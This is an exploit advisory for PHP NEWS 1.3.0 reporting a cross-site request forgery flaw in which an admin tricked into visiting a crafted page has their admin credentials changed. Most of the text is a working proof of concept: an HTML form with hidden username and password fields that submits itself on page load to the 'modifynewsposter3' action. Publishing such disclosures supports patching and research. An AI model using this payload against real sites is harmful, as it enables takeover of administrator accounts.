*=========================================================================================================
# Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)
# Author: Meryem AKDOĞAN
# Google Dork: -
# Date: 16/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: http://newsphp.sourceforge.net
# Software Link: https://sourceforge.net/projects/newsphp/
# Version: 1.3.0
*=========================================================================================================
DETAILS
========================================
PHP NEWS version 1.3.0 is vulnerable to a CSRF attack (no CSRF token in
place), meaning that if an admin user can be tricked into visiting a
crafted URL created by an attacker (via spear phishing/social
engineering), a form will be submitted to
(http://sitename/path/index.php) that will change the admin password.
Once exploited, the attacker can log in to the admin panel using the
username and the password posted in the form.
RISK
========================================
An attacker can change the admin password with this vulnerability.
TECHNICAL DETAILS & POC
========================================
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/phpnews/index.php?action=modifynewsposter3" method="POST">
<input type="hidden" name="id" value="7"/>
<input type="hidden" name="newusername" value="meryem akdogan"/>
<input type="hidden" name="username" value="meryem"/>
<input type="hidden" name="password" value="meryem123."/>
<input type="hidden" name="password2" value="meryem123."/>
<input type="hidden" name="email" value="b@gmail.com"/>
<input type="hidden" name="language" value="en_GB"/>
<input type="submit" value="Submit request"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
========================================